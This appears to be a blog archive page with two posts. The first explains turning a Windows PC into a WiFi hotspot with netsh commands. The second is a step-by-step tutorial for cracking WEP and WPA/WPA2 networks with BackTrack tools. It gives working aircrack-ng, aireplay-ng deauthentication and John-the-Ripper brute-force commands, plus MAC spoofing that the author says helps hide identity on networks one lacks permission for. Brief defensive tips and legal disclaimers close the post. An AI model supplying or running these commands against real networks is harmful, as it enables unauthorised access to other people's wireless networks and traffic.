Showing posts with label Hack Wifi. Show all posts
Showing posts with label Hack Wifi. Show all posts

Easily turn your PC / Laptop into a WiFi Hotspot without using any Software


You might have a WiFi dongle installed on your computer or even it might have come preinstalled in your laptop. While you will be able to access internet through a WiFi connection, but when it comes to sharing your internet connection via WiFi, you would have to rely on a third party tool such as connectify.

As most software, Connectify was once a freeware and disappointingly the developers decided to put a price tag on it. While connectify still has a free version available, but there are many restrictions on it.

Fortunately, Software such as connectify are just a secondary method of creating WiFi HotSpots for sharing your PC’s or Laptop’s internet connection. The primary method of creating WiFi HotSpots is very simple but it requires the use of the command prompt.

For those who want to create a WiFi HotSpot from their PC or laptop in order to share your internet connection through WiFi, the instructions below will guide you through the process.

Note: You will need to have a WiFi dongle or card installed on your PC in order to host a WiFi Hostspot.

How to turn a PC or Laptop into a WiFi HotSpot

Step 1: Open the Command prompt with Administrator rights. 

Step 2: Type in the following command 

 netsh wlan set hostednetwork mode=allow ssid=HotSpot key=12345678

Here ” HotSpot ” will be the name of the WiFi HotSpot you are going to create. You can change it to any other name of your choice.


Similarly the Key value i.e. “ 12345678 ” is the password to connect to the WiFi HotSpot, you can also change this to any value of your choice.

Step 3: Next type 

netsh wlan start hostednetwork

The result should look like this.


Step 4: Next you will have to Network and sharing center in Control panel and right click on your main network and select properties. i.e the network that you are using to access the internet. 



Step 5: Finally click on the sharing tab and check ” allow other network users to connect through this computer’s internet connect “ 



Thats it now you can search for the WiFi HotSpot from any WiFi enabled device and connect to it with the password key set by you.

If you have any queries/feedback, please write it in comments section below OR mail me here : Snehal[at]Techproceed[dot]com

Happy Wi-Fi sharing :-)

How to Hack Wifi (and how to avoid being hacked): WEP/WPA/WPA2

This guide is meant to show how easy it is to hack wireless networks if the proper security measures are not in place. First I will show how to hack a WEP or WPA/WPA2 Network and then I will give tips on how to avoid getting hacked.

This is important information in our techno-savy culture. If your wireless network is compromised you can be liable for any illegal activity on it. There are numerous stories of child pornographers and black-hat hackers using other peoples wireless networks.

NOTE: Hacking your neighbors or anyone else’s Wifi without their permission is ILLEGAL. Be smart!


Step 1 : What you Need

-A Computer. (A Laptop works best)-A Wireless Card capable of packet injection.
-If your laptop wireless card can’t do packet injection you can purchase a wireless adapter such as the Netgear WG111 v2 for around $8-$12 on eBay.

-A Live installation of BackTrack either on a CD or USB stick.
-BackTrack 5 Can be found Here
-Create a Live USB Install Here


Step 2 : Hack WEP

WEP is the predecessor of WPA and has been hacked for the past 5+ years yet people continue to use it. With the instructions below we can crack WEP in under 15 minutes.You can crack WEP from the command line but there is an easy GUI interface in backtrack which makes it a much less painful experience for those who are scared of command prompts.

1. Boot into BackTrack

2. Click on the Backtrack applications menu -> Backtrack -> Exploitation tools -> Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng (This will open up the GUI interface seen in the picture).

3. Go to the configuration menu and select the wireless interface wlan0
-Click on Enable/Disable Monitor Mode (this will put the wireless card into monitor mode).
-Select the newly created mon0 interface.

4. Now click on the WEP tab at the top of the window.
-Click on “Start sniffing and logging” and leave the terminal open.
-Once the wireless network you want to crack* shows up (it has to be WEP encryption of course) select the WEP Attacks (with clients). *note that the PWR has to be high enough to work so the closer you can get, the better.
-There you click on “Associate with AP using fake auth”, wait a few seconds and click on “ARP request replay”.

5. Once the Data number reaches over 10,000 you are ready to try (if the data is coming fast wait until 20 or 30,000 to be safe) and crack the key, but don’t close any windows yet.
-Go to the cracking tab and click on “Aircrack-ng – Decrypt WEP password” under Wep Cracking.

It will take a few seconds to minutes to crack the password and then you are good to go.


Step 3 : Hack WPA/WPA2

At least WPA and WPA2 are safe right? Wrong. WPA and WPA2 are both crackable but the time it takes to crack depends on the strength of their password.-Boot into BackTrack
-Open up Konsole which is a command line utility built into BackTrack. It is the Black Box in the Lower-Left Hand Corner (See Image).
We will now be entering the following commands into the command line noted by Bold as well as explanations as to what they do:

-The following commands stop the wireless interface so you can change your mac address, this is important because your mac address is a unique identifier so faking one is a good idea if you are accessing a network you don’t have permission to. (which by the way I wholly condemn)

1:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

2:
-Now we will put the airodump-ng tool into monitor mode, this will allow us to see all of the wireless networks around us (See the first Picture).

airodump-ng mon0

Now choose the network you want to hack and take note of the BSSID, and the Channel it is one as well as the ESSID. The PWR has to be fairly high to be able to hack it, this is determined by how close you are to the wireless router. The closer you are, the better.

Once you have chosen the wireless network enter the following into the terminal:
This will write capture packets and put them into the “filename” file, we are trying to capture the handshake between the router and wireless connection which will give us the key we need to crack.

3:
airodump-ng mon0 –channel * –bssid **:**:**:**:**:** -w filename

The following step is optional but is highly recommended as it will speed up the process a great deal.

Once “WPA handshake: **:**:**:**:**:**” appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur then do step 4.

4:
aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0

What this step (4) does is it deauthorizes a wireless connection and trie to re-establish it so it will generate a new handshake to capture. This step ends once you have captured the handshake.

5:
aircrack-ng –w wordlist.lst -b **:**:**:**:**:** filename.cap

Step 5 is now trying to crack the password in “filename.cap” using a list of words, here called “wordlist.lst” you can download a good 200 million word dictionary here (128MB but unzipped is 800MB).

Your computer has to compute the hash value of every password in that list but a computer can go through those 200 million passwords in 6-12 hours.

6.

If the password isn’t found in the dictionary you can try and brute-force the password with this command: (Note this could take a very long time depending on their password strength).

/pentest/password/jtr/john –stdout –incremental:all | aircrack-ng -b **:**:**:**:**:** -w – filename.cap



Step 4 : Secure Your Own Wireless Network

Hopefully you gained some insight into how to not get your own wireless connection hacked:

1. Use WPA2 (WPA2-AES) if available and by all means never use WEP.
2. Don’t base your password on a dictionary word. The next section focuses on passwords in general.
3. In your router settings you can usually hide your ESSID (the name of the wireless network) this will add a small layer of security.
4. In your router there is probably a mac-address filtering service where you can specify the mac addresses that are allowed to connect. This will make sure that only your approved devices can connect to your network. (obviously a problem though if you have a guest over and wants to connect to your Wifi).